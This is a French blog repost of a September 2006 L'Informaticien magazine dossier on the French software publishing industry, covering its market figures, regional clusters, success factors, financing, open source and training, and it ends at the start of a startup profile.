vendredi 30 septembre 2016
 
L'INFORMATICIEN N°39
Numéro de septembre 2006

INF039_01.jpgPour ce numéro de rentrée, L'Informaticien s'est montré chauvin ; ce fait rare nous sera pardonné, notre attention étant habituellement portée vers les multinationales de la profession, il nous fallait bien pour une fois y faire exception. C'est donc à la France du Soft (comprenez Software, et non Softball) que le dossier de ce numéro est consacré. Toutefois, si la géopolitique logicielle vous ennuie, nous avons consacré une bonne partie du magazine à des préoccupations plus terre-à-terre, comme de développer une application de géolocalisation sur votre Smartphone (pour faire comme Tom-Tom et Jean-Jean, mais tout seul). Pour vous faciliter la vie, nous vous dévoilons également les dessous de Google Calendar, afin que vous puissiez contrôler en temps réel les agissements de votre famille et de vos collègues (et pourquoi pas, avec un peu d'astuce, les géolocaliser sur vorte smartphone ?). Enfin, il reste aux littéraires notre page "aventure", où le léopard sort de la jungle... pour les besoins de l'actualité, Bob Morane a été ici remplacé par Steve Jobs. Bonne lecture !
p.1
Réduire
LA FRANCE DU SOFT
Bienvenue dans la French Valley !
Par Bertrand Garé - Copyright L'INFORMATICIEN, tous droits réservés

À côté d’un secteur des services florissant, le développement et l’édition de logiciels sont-ils les parents pauvres du secteur informatique en France ? La plupart des analystes stigmatisent le retard de notre pays dans ce secteur et le nombre limité de réussites au plan mondial. À écouter ces Cassandres, à part quelques exemples en trompe l’œil, l’industrie du logiciel est inexistante en Europe. A fortiori en France. L’Informaticien a voulu en avoir le cœur net et a mené son enquête.

Lors de la dernière conférence de l’AFDEL, une association française d’éditeurs de logiciels, Mathieu Pelissié du Rausas, directeur associé chez Mac Kinsey & Company, dressait un bilan clairement négatif de l’industrie logicielle européenne : « Seuls trois éditeurs européens ont un chiffre d’affaires qui dépasse le milliard de dollars, contre treize Américains… Or, l’écart se creuse entre les continents ; constat d’autant plus préoccupant que ce secteur stratégique conditionne l’avenir d’autres industries de pointe, comme l’automobile et la Défense. »
Il reconnait aussi que l’Europe dispose cependant d’indéniables atouts pour revenir dans la compétition à l’avenir, si les principales causes du retard sont corrigées : fragmentation du marché intérieur et exiguïté du réservoir de talents.

grotablo.jpg

L’Informaticien a voulu s’assurer de la réalité de ce sombre constat et a réalisé sa propre enquête. Nous avons adressé un questionnaire aux éditeurs français présents dans le classement Truffle 100 pour recueillir à la fois des données chiffrées (CA, effectif…) et des éléments qualitatifs, notamment les facteurs qui leur ont semblé important dans leur parcours, les moyens de financement utilisés, leur demande en termes d’emploi et de formation, leur vision par rapport à l’Open Source. Nous avons complété cet échantillon avec des éditeurs de taille plus petite pour élargir le panel et obtenir une plus large représentativité.
Ainsi, les entreprises qui ont répondu vont de Dassault Systèmes, le numéro 1 du domaine dans notre pays, dont le chiffre d’affaires dépasse le milliard de dollars, à une société à 1 salarié en cours de constitution.
D’un point de vue technologique, la plupart des familles de logiciels sont représentées, ainsi que la plupart des systèmes, qu’ils soient distribués ou centraux, propriétaires ou libres.
Nous remercions d’ailleurs tous les éditeurs, petits, moyens et grands qui ont répondu spontanément et de bonne grâce à ce questionnaire. Cette enquête ne vise pas l’exhaustivité mais cherche à dresser un tableau le plus fidèle possible du secteur de l’édition du logiciel dans notre pays. La contre-enquête menée permettra aussi de croiser les résultats et, parfois, d’apporter de nouveaux éléments aux deux importantes enquêtes réalisées dans l’année sur le sujet par le Syntec Informatique et l’AFDEL.
À part certains éditeurs, que nous avons recontactés pour exploiter leurs réponses, nous utiliserons les informations de manière anonyme dans ce dossier. Certains nous ont livré parfois des sentiments un peu « abrupts » sur la situation et ne souhaitaient pas que leur nom y soit publiquement associé.




L’industrie du logiciel
Chiffres-clés France

• 2 500 éditeurs à capitaux français ;
• l’industrie logicielle emploie 60 000 personnes ;
• son chiffre d'affaires 2005 : 7,2 milliards d’euros ;
• les dépenses en logiciel en France ont crû deux fois plus vite que les dépenses en matériel lors des dix dernières années ;
• aucun éditeur français ne figure dans les 20 premiers éditeurs mondiaux ;
• seuls 30 éditeurs réalisent un CA de plus de 50 millions d’euros et moins de 100 un CA de plus de 10 millions d’euros.




IMPLANTATIONS
Et ils sont où les éditeurs ?

On pourrait s’attendre à ce que l’industrie française du logiciel soit disséminée un peu partout sur le territoire. En effet, il suffit d’avoir de la matière grise et des ordinateurs pour devenir éditeur de logiciel. Eh bien non ! Si un tissu d’éditeurs est présent dans toutes les régions, certaines d’entre elles se distinguent par une spécialisation accrue dans ce domaine. La création de pôles de compétitivité dédiés a renforcé le phénomène. Aujourd’hui, la carte de la France du Soft recouvre, peu ou prou, la carte de la Recherche et Développement dans notre pays.
Loin d’être un désert comme beaucoup l’imaginent, la France est bien une terre de logiciels. Des éditeurs, souvent de taille modeste, sont présents partout sur le territoire. Cette présence diffuse s’explique pour beaucoup par l’histoire de l’industrie informatique en France.
Les débuts de l’informatique dans notre pays se sont centrés sur des sociétés de services distribuant des logiciels ou des matériels venant de l’étranger. En augmentant peu à peu leurs compétences, ces sociétés de services se sont mises à développer des logiciels pour leurs clients. Quelques-uns de ces programmes ont même connu un engouement certain. Lorsque le succès était là, ces SSII sont devenues, pour une partie, éditrices de logiciels. On peut ainsi citer GFI qui, avec un pôle service conséquent, poursuit une activité d’éditeur. Il en va de même pour Sopra. Nous ne les citerons pas toutes, mais elles sont nombreuses dans ce cas.


logmap.jpg

De la SSII à l’éditeur

Avec la montée de cette activité, les sociétés de services ont séparé les activités d’édition de leur cœur de métier dans le service. Une industrie se créait avec une forte coloration régionale. Ainsi Deal, un éditeur du Sud-Ouest, créait des produits spécifiques pour les négociants et viticulteurs de la région. Là encore, on pourrait multiplier les exemples. Cette activité a connu une nouvelle révolution dans les années 90 avec l’arrivée à maturité de l’informatique de gestion.
À ce moment, les éditeurs s’industrialisent pour répondre de manière générique aux besoins de leurs clients. C’est alors que se détachent des éditeurs de logiciels plus généralistes qu’auparavant, ou vers des niches très porteuses et, à l’époque, très en avance. Dans ce creuset, on trouve quasiment toutes les « stars » de l’édition logicielle française : Business Objects, Ilog… Ce changement radical de perspective perdure aujourd’hui. Le phénomène se nourrit de la coexistence de départements de recherche universitaires et du soutien d’entreprises grands comptes intéressées par les travaux de ces éditeurs et cofinançant ou proposant des ressources pour développer des fonctions plus spécifiques qui seront ensuite intégrées dans le logiciel.
Cette liaison redessine peu à peu la carte de l’édition logicielle en créant des poches d’écosystèmes spécifiques autour du développement de logiciels spécialisés dans certains domaines. Un autre élément renforce la situation. Près d’un tiers des emplois dans l’édition logicielle française concerne la recherche-développement. Au minimum de niveau ingénieur, ces emplois sont souvent issus du monde universitaire. Ils ont donc tendance à conserver une proximité avec leur formation initiale, en université ou en école d’ingénieurs. Certaines métropoles de provinces s’en sortent mieux que d’autres. Ainsi, la région lyonnaise est assez importante avec de nombreux éditeurs à la tête desquels figure Cegid. Mais le gros pôle de recherche se situe davantage sur Grenoble.
La façade Ouest de notre pays est plutôt consacrée au développement dans les télécoms et les réseaux. La région parisienne domine de toute sa puissance démographique et économique du fait du plus fort vivier d’éditeurs.


Une tendance à la spécialisation

Ainsi, au fil du temps des régions se sont spécialisées sur certains domaines dans l’édition logicielle. Les pôles de compétitivité (voir notre encadré) structurent désormais cet état de fait en huit zones principales regroupant financements, projets et débouchés pour ces recherches.
Le principal effet immédiat est de renforcer la symbiose entre éditeur, département de recherches et grandes entreprises. Un triptyque désormais incontournable dans le lancement de nouveaux projets. Il reste encore à démontrer sa viabilité économique pour le long terme dans le développement de l’industrie de l’édition de logiciels.




Les pôles de compétitivité pour les TIC
Il y a tout juste un an, le Premier ministre dévoilait une liste de 67 pôles de compétitivité avec une enveloppe de 1,5 milliard d’euros à la clé pour soutenir les différents projets développés. Quatre de ces pôles se concentrent directement sur les technologies de l’information et de la communication. Deux d’entre eux développent des projets sur les infrastructures et les solutions d’entreprises : l’un dans la région Provence-Alpes-Côte d’Azur sur les communications sécurisées et l’autre en Île-de-France sur les applications pour les systèmes d’information complexes. Un autre pôle en Basse-Normandie s’intéresse aux usages professionnels, en particulier les transactions électroniques sécurisées. Le dernier se trouve en Limousin et Midi-Pyrénées et travaille sur les infrastructures réseau. D’autres pôles agissent sur des usages tournés vers l’utilisateur final. Ainsi, le Nord développe des projets liés à l’e-commerce. La Bretagne se spécialise sur l’imagerie numérique. La région Île-de-France a aussi un pôle pour le graphisme et la 3D. La région Rhône-Alpes développe quant à elle des projets dans le monde du jeu vidéo.


p.2
Réduire
FACTEURS CLÉS
De fortes disparités entre les éditeurs

L’édition logicielle est une industrie comme les autres ! Ainsi, s’il y a beaucoup d’appelés, et peu sont élus. Les disparités sont fortes dans ce secteur à la fois en termes de chiffres d’affaires, d’emplois et de possibilités de développements futurs. Souvent peu présents à l’international, les éditeurs français se lancent désormais dans la compétition mondiale avec certains atouts, mais aussi des faiblesses criantes. Il ne manque cependant pas d’initiative pour y remédier.
Contrairement à d’autres pays européens, comme l’Italie ou l’Espagne, l’édition de logiciels peut paraître florissante en France. On pourrait la comparer à nos forêts. Comme celles-ci, elle est en expansion. Mais si de grands arbres se distinguent de loin, il existe beaucoup de taillis sous cette haute futaie…

ptitablo.jpg


Une forêt fertile

Avec 2 500 éditeurs répertoriés, la France fait partie des pays les plus dynamiques en termes d’édition de logiciels. Qui peut citer deux éditeurs italiens ou espagnols d’envergure internationale aujourd’hui ?
Sur ce terreau assez fertile, seuls quelques éditeurs français ont gagné une place au soleil de l’international. Si à notre échelle nationale ces éditeurs font de l’ombre aux autres, ils ont aussi du mal face au gigantisme des éditeurs américains. Ainsi, aucun de nos représentants ne se classe dans le top 20 mondial. Ce phénomène peut être étendu à l’Europe avec une seule exception notable, l’Allemand SAP.
Nos champions nationaux sont Dassault Systèmes et Business Objects. Certaines entreprises très pointues ont réussi à se hisser à des places respectables. Citons dans le secteur bancaire des éditeurs comme GL Trade, ou Linedata. Si le marché domestique ne suffit pas à ces éditeurs, ils profitent tout de même de son dynamisme.
Selon l’AFDEL (Association française des éditeurs de logiciels), le marché des logiciels dans notre pays représente 12 milliards d’euros. Il est le troisième marché en volume en Europe, derrière l’Allemagne et le Royaume-Uni. En gros, cela représente 6 % du marché mondial. En proportion, le marché américain concentre 45 % des achats.
JP_BRULARD10522_Copier5.gifIntéressant à constater : les éditeurs français ont réalisé 7,2 milliards d’euros de chiffre d’affaires l’année dernière en comptant leurs ventes à l’étranger, selon des chiffres fournis dans une étude réalisée par le CXP et l’IDC pour le compte du Syntec Informatique. Jean-Pierre Brulard, sous sa casquette de responsable du Syntec Informatique pour les éditeurs de logiciels, précise que « dans ce chiffre, les éditeurs français réalisent 4,7 milliards de ventes en France. Le reste est à l’export ». On peut ainsi constater que les éditeurs français réalisent une part substantielle de leurs ventes sur le marché national et résistent bien à la concurrence étrangère.
Cette constatation dépend évidemment des secteurs d’activité de ces éditeurs. Les parts de marché des éditeurs français sont cependant en baisse. Les logiciels systèmes et infrastructures représentent moins de 6 % de ce total. Les logiciels outils conservent une part de 15 %. Les logiciels applicatifs se prennent la part du lion avec 50 %.
L’effet « village gaulois » est impossible à quantifier, mais il est certain que certains éditeurs jouent sur la fibre nationale pour préserver leur position sur le marché intérieur. Il est ainsi rare de voir des logiciels commerciaux étrangers dans les grandes institutions publiques françaises. Cette préférence est au mieux européenne même si elle n’est jamais clairement exprimée.

editeur2.jpg


Des zones d’ombre

La faiblesse à l’international se retrouve dans les chiffres d’affaires des éditeurs. Seuls les deux grands éditeurs déjà cités dépassent 750 millions d’euros de chiffre d’affaires. Dassault Systèmes culmine à 944 millions dans les derniers chiffres annuels publiés. Derrière, seule une trentaine d’éditeurs réalisent annuellement plus de 50 millions d’euros en vente de logiciels et de services associés ; 350 d’entre eux dépassent les 5 millions d’euros. Pour Jean-Pierre Brulard, cette limite marque une vraie césure dans la structuration et le développement des éditeurs.
Dans un contexte économique marqué par une forte concentration dans le secteur de l’édition de logiciels, ces faiblesses capitalistiques apportent de la fragilité dans ce secteur stratégique pour le développement de notre pays. Cette course à la taille n’a pas que des effets sur les cours en bourse ou pour gagner rapidement de nouveaux clients. Ils atteignent une taille critique permettant de financer le développement. Les volumes de vente, la taille et l’expansion internationale sont les seuls éléments permettant d’y pourvoir.
Dans cette course à la concentration, les acteurs français s’illustrent aussi par des rachats importants. Dassault Systèmes a acquis l’éditeur américain MatrixOne, et Business Objects a alimenté toutes les gazettes économiques et informatiques lors du rachat de Crystal Decision.
Moins connus, moins argentés, les autres éditeurs français n’ont qu’une alternative : se développer de manière indépendante ou s’adosser à des sociétés majeures du marché pour continuer leur marche en avant.

editeur3.jpg


Les éditeurs cultivent leur jardin

Le fait que les éditeurs français soient peu représentés au niveau international en valeur absolue des ventes provient aussi du fait qu’ils réussissent dans des niches de marché ou des besoins métier spécifiques. Cependant, ils arrivent assez souvent à truster les premières places du podium dans leur secteur de spécialité. Ce manque de logiciel généraliste pèse aussi dans la balance.
Les réponses obtenues à la suite de notre enquête démontrent que les éditeurs français sont très attachés à cette stratégie de niche plus en rapport avec leurs besoins capitalistiques, mais aussi leur permettant de rivaliser avec les grands généralistes sur des points précis.
La plupart des éditeurs se placent sur des marchés considérés comme porteurs à l’avenir ou désertés par les acteurs de taille internationale, car non rentables pour de telles structures.
D’ailleurs, la plupart d’entre eux annoncent que la conjoncture dans leur secteur d’activité est plutôt bonne, ou assez bonne, et sont assez confiants pour l’avenir proche.
Dans ces niches, à peu près tous les secteurs du logiciel sont représentés. Il en va de même pour les technologies ou les fonctionnalités. De l’ERP au décisionnel, en passant par les moteurs de recherche ou les systèmes d’intégration, les éditeurs français sont aussi présents sur tous les marchés pour fournir des solutions aux entreprises françaises dans les environnements distribués, centralisés sur des plates-formes propriétaires ou libres.
Le secteur s’appuie sur une universalité des projets afin de répondre aux différents besoins. Ce n’est pas le cas dans nombre de pays où les choix sont beaucoup plus restreints.
L’étude menée pour le Syntec Informatique affine cette vision par la prédilection annoncée des éditeurs pour certains secteurs : la gestion de contenu, la sécurité, la gestion de la relation client, le décisionnel et le développement d’applications Internet. Ces secteurs recouvrent ainsi les pôles que nous avons dessinés dans notre article précédent.


De jeunes pousses prometteuses

Dans ce maquis d’éditeurs, les plus petits ne sont pas les plus mal lotis. L’étude menée pour le Syntec montre que près de 150 éditeurs, plutôt jeunes (cinq ans d’existence en moyenne) connaissent des croissances et des taux de rentabilité bien au-dessus de la moyenne : 41 % de ces 150 éditeurs affichent des résultats nets de plus de 10 % contre 25 % pour l’ensemble de la profession de l’édition de logiciels. Certains atteignent les 50 %. Les trois quarts d’entre eux comptent moins de 20 salariés et 42 % ont réalisé plus de un million d’euros de chiffre d’affaires.
Ces éditeurs se caractérisent par des choix technologiques et commerciaux très innovants avec un penchant marqué pour l’Open Source. Pour une bonne part, ils ont choisi de fournir leur solution sous forme hébergée : 12 % d’entre eux ont choisi ce mode locatif.
Ils ont de plus un comportement très dynamique puisque 29 % des entreprises détectées envisagent des acquisitions pour élargir leur catalogue de solutions et s’ouvrir de nouvelles opportunités en augmentant leurs revenus.
Selon Jean-Pierre Brulard, « Il faut leur créer un écosystème favorable pour éviter que ces entreprises soient balayées en leur permettant d’élargir leur domaine au fur et à mesure de la croissance. »


Les facteurs clés de la réussite

labed04copie11657_Copier6.gifCette croissance pour de jeunes entreprises, ou de moins jeunes, repose sur des éléments tangibles. Lors de la rédaction de notre questionnaire, nous nous attendions à ce que le premier facteur clé soit la technologie ou celui de la recherche et développement, qui occupe une place prépondérante dans les ressources des éditeurs français. La réponse n’est pas celle-ci : 40 % des éditeurs mettent le marketing en avant. Pendant longtemps, les entreprises françaises n’étaient pas des spécialistes de ce domaine. Cela change peut-être. Jamal Labed, directeur général de Staff & Line, et porte-parole de l’AFDEL, a aussi sa propre explication à cette réponse étonnante : « Les cimetières de l’informatique française sont pavés de produits et technologies innovants qui n’ont pas rencontré leur public ! Pendant des années, on a rabâché que les bons produits ne suffisaient pas et que le marketing était aussi important. Que le bon produit était nécessaire mais pas suffisant. Ils se sont donc adaptés à cette donne. De notre point de vue, cette vision nous semble un peu dépassée du fait d’un élément nouveau avec des clients bien plus matures qu’auparavant. »


Prouver le concept

« Pendant longtemps, l’approche marketing a suffi pour vendre des produits aux entreprises qui ne connaissaient pas bien les outils ou les implications de leur mise en œuvre. Ce n’est plus le cas aujourd’hui avec des clients très au fait des choses et qui ne demandent pas seulement que l’on montre que la solution peut répondre à leur besoin. Il faut le démontrer avec des maquettes ou des preuves du concept. Il ne faudrait pas que le balancier aille trop loin dans ce sens du marketing, car il serait tout aussi inadapté aujourd’hui.
Cet axe a été tellement important que certains financiers croyaient même que l’industrie du logiciel française allait disparaître face au rouleau compresseur du marketing américain. Cette approche est évidemment intégrée par les entreprises plus jeunes. Elles aussi ont changé. Les dirigeants de ces entreprises sont plus des gestionnaires que des techniciens ou des ingénieurs. Ils ont donc cette culture. Cependant la vente de logiciel aujourd’hui devient industrielle car les clientes achètent de manière de plus en plus rationnelle. Et sur ce terrain, les plus petits, spécialisés, peuvent tirer leur épingle du jeu car leur technologie est plus innovante que dans les grandes structures. »



Marketing et réseau commercial

L’élément clé suivant n’est toujours pas la technologie mais le réseau commercial. Les explications à cette réponse sont à peu près les mêmes que pour le marketing, mais il faut aussi y ajouter la proximité nécessaire avec les clients pour apporter un service de support et de maintenance satisfaisant. L’étude réalisée pour le Syntec met ce point en exergue. Dans les axes de développement à deux ans des jeunes éditeurs, le recrutement de partenaires distributeurs en France ou à l’international sont les deux priorités, largement devant le rachat de sociétés.
Cet aspect crée d’ailleurs certains points de tension entre les éditeurs, qui ont une activité à forte marge, et leurs partenaires, issus du service dont les marges ont une tendance à la baisse. Il devient alors très tentant de se lancer dans l’aventure du logiciel pour restaurer ce taux de marge. Le phénomène pourrait trouver sa concrétisation avec les SSLL, les sociétés de services spécialisées sur les logiciels libres qui combinent leur approche service avec la fourniture de logiciels. Il reste cependant que les deux modèles, édition et service, sont pour beaucoup irréconciliables avec des intérêts antagonistes. Et que le modèle commercial classique demeure dominant. Il prend pourtant de nouvelles formes avec l’extension de la fourniture de logiciels sous la forme de services avec le mode hébergé. Ce modèle ancien issu des années de l’Internet florissant commence à prendre sa place du fait de sa maturité. Il semble aujourd’hui correspondre à un besoin et devrait connaître un véritable décollage dans les mois à venir.
La technologie est l’élément suivant, en ordre d’importance, pour la réussite des éditeurs qui ont accepté de répondre. La technologie apparaît comme le vecteur de leur adaptation au marché et aux demandes de leurs clients qui désirent le plus souvent des logiciels simples d’utilisation sur des couches Internet et ouverts aux autres éléments de leurs systèmes d’information. Dans le domaine, l’Open Source commence à percer mais ne révolutionne ni ne « dynamite » les technologies traditionnelles.


La technique vient ensuite

Autre point clé de la réussite des éditeurs, les ressources humaines. La plupart des éditeurs soulignent qu’ils n’auraient pu réussir sans leurs équipes internes. Ce point est cependant plus mis en avant par les entreprises commençant à avoir une structure un peu étoffée. Dans les plus petites, le facteur est reconnu comme important mais il est consubstantiel à la structure car chacun remplit plusieurs rôles à la fois dans l’entreprise. D’ailleurs ces petites structures n’ont pas ou peu de services spécialisés dans le domaine des ressources humaines. Dans une certaine mesure cela représente un frein. Pourquoi s’engager dans une entreprise qui ne vous permet pas de progresser, qui ne reconnaît pas vos apports pour définir un plan de carrière ? Ce point peut aussi jouer son rôle dans la désaffection relative que connaît le secteur vis-à-vis des étudiants.
En dernier lieu, la R & D est l’élément clé de la réussite des éditeurs français. Cette réponse est pourtant antinomique avec la place qu’elle occupe chez les éditeurs. Chez les éditeurs américains, les ressources commerciales et marketing représentent 40 % des employés. La R & D ne représente que la moitié de ce taux. En moyenne, en France, la proportion serait inverse selon le Syntec.
Il est dépensé dans ce secteur près de 820 millions d’euros par an. Cela représente 2,3 % des efforts de recherche globaux de notre pays. Si cette composante n’est pas mise en avant, elle reste un pilier car tous les éditeurs insistent sur le besoin de qualité des produits et l’innovation qu’ils embarquent. Le poste reste essentiel en emplois et en budget mais perd sa prééminence dans l’industrialisation du processus de mise sur le marché des logiciels.
Ces éléments devraient assez peu évoluer à l’avenir. La plupart des répondants ne changent pas la priorité de leurs choix lorsqu’on leur demande d’évoquer les facteurs clés de réussite pour leur entreprise à l’avenir. Les réponses confirment cependant la tendance perçue par l’étude menée pour le Syntec avec une place accrue pour les réseaux commerciaux qui viennent talonner le marketing.
p.3
Réduire
FINANCEMENT
Des aides publiques inaccessibles

Un des problèmes de l’industrie française du logiciel est de trouver de quoi financer son développement et d’assurer sa pérennité sur le marché. Ce point critique est l’une des difficultés du moment. Même les aides publiques ou les réseaux d’aides sont mal identifiés. Et l’impulsion publique pour le secteur est mal perçue.
La question du financement pour le développement à long terme de l’industrie de l’édition logicielle est un point critique pour notre pays. Il concerne en premier lieu les emplois de demain. Pour Jamal Labed, « On sait bien que les emplois de demain dans notre pays ne seront pas dans la sidérurgie ou dans le textile. » Il faut donc, pour conserver des emplois de haut niveau, permettre le développement de cette industrie, la rendre pérenne et faciliter l’entrée de nouveaux acteurs.
En dehors du secteur des logiciels de gestion, éditeurs assez bien implantés sur le marché français, ou présents sur des technologies de type mainframes, la plupart des répondants à notre enquête affirme avoir connu des problèmes de financement en phase de démarrage. Ce constat démontre une césure entre les premières générations de l’informatique en France qui avaient les moyens de se développer sur leurs seules forces internes et les générations suivantes beaucoup plus fragiles. Ces entreprises rappellent aussi qu’elles sont toujours à la recherche de financements pour leur développement international ou produit. La question taraude le secteur depuis longtemps. Certaines indiquent même que la croissance organique actuelle ne peut assurer leur développement pour les cinq ans à venir. Il devient urgent d’agir à défaut de voir disparaître des entreprises et des emplois. Comme souvent dans ce cas, les entreprises se tournent vers les pouvoirs publics et les politiques d’aide. La méthode semble cependant connaître des limites.


Une politique mal comprise

La question fait quasiment l’unanimité chez nos répondants. La politique publique en direction de leur secteur est inexistante ou absolument incomprise. La plupart des éditeurs répondent qu’il n’existe pas de stratégie ou de politique industrielle appropriée pour leur secteur. Certains mettent même en doute la volonté d’en avoir une. La plupart stigmatise aussi le peu de compétence des personnes s’occupant de ces dossiers. Pourtant des efforts sont réalisés. Ils ne semblent pas toucher leurs cibles. Le point le plus concret de cette incompréhension se retrouve dans les schémas d’aide à cette industrie. Elle semble pour le plus grand nombre inefficace. Jamal Labed stigmatise ainsi « l’empilage de mesures sans rapport entre elles : Mairie, Conseils généraux et régionaux, Europe, établissements publics, réseaux. Cela représente un véritable maquis dans lequel il est difficile de se retrouver ».
La demande principale pour remédier à cette situation est une remise à plat des dispositifs pour gagner en clarté et en efficacité. Le mot guichet unique est parfois lâché, mais sans grande conviction sur la possibilité d’atteindre ce but.
Autre problème soulevé, la difficulté d’obtenir ce type d’aides et la complexité des dossiers à remplir pour les obtenir. Seul le système de l’ANVAR est clairement identifié par la plupart des répondants. D’autres citent encore le RNTL ou l’Inria, mais pour la plupart leur connaissance des possibilités d’aide s’arrête là. Quelques répondants citent pourtant les possibilités offertes par les autorités locales ou européennes. Deux éditeurs affirment avoir obtenu des aides (financières ou non) via des départements, un autre par l’Union Européenne.


Le recours à l’initiative privée

Devant ce manque, les acteurs de l’industrie logicielle se tournent vers les initiatives privées comme celles des capitaux-risqueurs ou des banques. Dans ce secteur, les entreprises doivent faire face à une certaine désaffection des financiers pour entrer dans l’aventure du logiciel. Les financiers deviennent prudents dans le domaine et la plupart sont persuadés qu’il est inutile d’investir dans ce secteur voué à l’échec ! Cette vision a pour conséquence un véritable manque dans le secteur de l’amorçage ou de la structuration du capital-risque dans notre pays. Des expériences comme en Israël pourraient être salutaires à analyser pour créer les conditions d’un véritable environnement de financement du secteur. Jamal Labed va dans ce sens lorsqu’il explique qu’« il faut créer les conditions favorables au développement ». L’AFDEL propose de simplifier cet accès en prenant des mesures techniques simples ; « par exemple sur le code des marchés publics. Si les éditeurs augmentent leurs chiffres d’affaires de quelques milliers à quelques millions d’euros, vous verrez les capitaux-risqueurs reviendront », ajoute-t-il. Le Syntec Informatique propose, lui aussi, un plan d’action. Jean-Pierre Brulard détaille : « 20 % des éditeurs possèdent plus de 300 000 euros de fonds propres. Pour la plupart, ils n’ont pas les moyens financiers de payer la croissance ; 50 % n’ont pas de protection sur leur propriété intellectuelle. On a donc créé un label, Pacte Croissance Éditeur, avec des partenaires financiers et juridiques pour résoudre ces problèmes pratiques. Avec quatre programmes qui fournissent des produits adaptés et immédiatement disponibles. » Il reste que ces mesures ne pourront porter leurs fruits que dans quelques temps. Si les éditeurs les utilisent. Car certaines d’entre elles sont tombées totalement en désuétude. Notamment les crédits d’impôts recherche. Des problèmes techniques de mise en œuvre – et quelques redressements fiscaux ! – limitent l’intérêt de cette mesure.


OPEN SOURCE
Alternative ou concurrence ?

L’Open Source connaît un développement important dans notre pays. Comment ce secteur est-il perçu par les éditeurs ? Les résultats sont loin d’être négatifs, ce qui peut sembler étonnant du fait d’intérêts parfois antinomiques. Quelle est la place de l’Open Source aujourd’hui chez les éditeurs français ? Comment est-il considéré ? Le premier point est qu’il est perçu comme une opportunité pour la plupart d’entre eux. Ainsi, André Jeannerot, directeur marketing chez Lefebvre Software, indique : « Quand nous avons réécrit notre logiciel avec des technologies nouvelles, l’Open Source nous a permis de ne pas partir d’une feuille blanche et de gagner du temps donc de l’argent lors de cette opération. » Une minorité d’éditeurs intègrent déjà des briques Open Source dans leurs solutions. D’ailleurs, ils semblent avoir envie d’enterrer les haches de guerres de religions et n’attendent pas au coin du bois pour faire le procès du modèle. Selon Jamal Labed, « Nous ne sommes pas là pour de grands procès en sorcellerie. Notre métier est de fournir des logiciels avec de l’innovation. Cette innovation nous coûte cher et nous souhaitons pouvoir protéger cette innovation. L’Open Source ne travaille pas sur ce modèle mais vend du service autour d’un logiciel gratuit ou non. Mais aujourd’hui, avec le modèle Dual Licensing, on se demande qu’elle est la différence puisque vous payer pour le Soft et sa maintenance. »


Un stimulant pour s’améliorer

« Ce n’est pas en reversant de temps en temps des éléments pour des versions clientes gratuites que cela fait avancer les choses. Cela ressemble à beaucoup de marketing. Pour le reste, le modèle classique est toujours là. D’ailleurs, il a du bon. Il nous stimule, nous, éditeurs et nous permet une remise en cause pour devenir encore meilleurs, comme le fait l’ASP ou d’autres phénomènes. Nous voulons juste que ce débat soit clair par l’explication, car les clients aujourd’hui doivent pourvoir choisir de manière éclairée avec de la transparence sur le retour sur investissement réel qu’ils réalisent sur les logiciels qu’ils mettent en œuvre. »
Ainsi, les répondants voient dans l’Open Source une alternative à laquelle leur entreprise adhère plus ou moins, mais à part dans certains secteurs comme la gestion de contenu, le « libre » n’est pas un concurrent.
Sur l’adhésion à ce modèle, les choses se font plus lentement. Le principal frein identifié est tout simplement que les clients de ces éditeurs ne sont pas actuellement intéressés par ce modèle. Devant le manque de demandes client, les éditeurs ne se bousculent pas pour apporter la « vérité révélée ».


FORMATION
Un secteur oublié dans les grandes filières ?

Un des signes de la santé du secteur en France est la volonté de la plupart des éditeurs d’embaucher dans les mois à venir. Cela semble rassurant ; mais quand on les interroge sur l’adaptation de la formation à leur métier spécifique, les retours se font négatifs. Le secteur de l’édition et du développement de logiciels non seulement retient ses salariés mais aussi recrute et forme. Le profil recherché est plutôt celui de l’ingénieur. C’est sans surprise. La formule d’embauche sera le CDI. Seules les entreprises en constitution ou vraiment à leur début déclarent ne pas avoir de projet d’embauche. Mais ils recherchent des partenaires ou des gens « pour rompre la solitude du créateur d’entreprise ». Il est vrai que les plans d’embauche deviennent urgents devant l’émergence de problèmes démographiques comme le Papy-boom. Jean-Pierre Brulard ajoute que « la tendance continue. L’année dernière, le secteur a créé 7 000 emplois nets. Cependant, nous constatons une désaffection pour la branche. Et d’ici 2015, 150 000 informaticiens vont partir. De l’autre côté, nous formons 10 000 informaticiens par an. Cette désaffection est d’ailleurs générale et se retrouve au niveau européen, voire mondial. Nous réalisons actuellement une étude sur la question. Elle montre un écart entre l’image du secteur et la réalité lorsque les gens y sont. Évidemment, cela provoque des tensions sur les salaires. Il nous faut donc trouver des moyens pour attirer plus de gens ». Cette recherche va se réaliser dès le vivier des écoles. Ainsi, le Syntec a mis en place le programme Pascaline qui réunit les grandes écoles et les universités. La tâche n’est cependant pas aisée. Ce programme va s’accompagner d’un renforcement de l’apprentissage et d’une ouverture plus grande à la validation de l’expérience professionnelle. Jamal Labed explique : « il n’existe même pas de code INSEE pour notre activité. Alors, pour créer des filières spécialisées ! »


Les éditeurs se prennent en main

C’est bien là que le bât blesse. Sans formation spécifique, les étudiants et les jeunes diplômés ne connaissent pas le métier de l’édition logicielle et n’ont pas les bons réflexes en sortant de l’école. La formation apportée semble donc répondre partiellement aux besoins des éditeurs avec des manques cruels dans les secteurs du test, des langues et des environnements autres que Microsoft et Oracle ! Pour apporter de l’efficacité dans la formation, les écoles proposent des formations sur les environnements les plus « utilisés ». Le phénomène s’inverse alors pour trouver des compétences sur les autres environnements. D’ailleurs, même ces environnements changent et (lire nos articles de la rubrique « métiers » dans ce numéro) déjà la pénurie de compétences menace. Les éditeurs se prennent donc en main et proposent de plus en plus des formations maisons sur le format des Universités apportant des certifications sur des logiciels ou des technologies. La solution passera aussi par le rapprochement des éditeurs avec le monde universitaire. La création d’écosystèmes entre grands donneurs d’ordres, universités et éditeurs, comme le réalisent les pôles de compétitivité ou le RNTL (Réseau national de recherche et d’innovation en technologies logicielles) peuvent apporter une certaine réponse. Il faudrait pourtant qu’il devienne aussi gratifiant d’être dans l’édition logicielle en rehaussant
l’image du secteur. Sur ce point, la réflexion doit être conduite par les éditeurs eux-mêmes et personne ne pourra le faire pour eux. D’ailleurs aucun de nos répondants ne demandent l’instauration d’une filière spécialisée dans les universités ou dans les écoles d’ingénieurs. Un oubli sans doute !

Les jeunes pousses du logiciel

Les différentes études que nous citons dans les pages précédentes parlent de jeunes entreprises avec de très forts potentiels. En voici un panel limité. Elles nous semblent les plus représentatives de certaines tendances de notre dossier  et commencent déjà à sortir de l’anonymat !

ADVESTIGO

La théraographie pour protéger les œuvres numériques

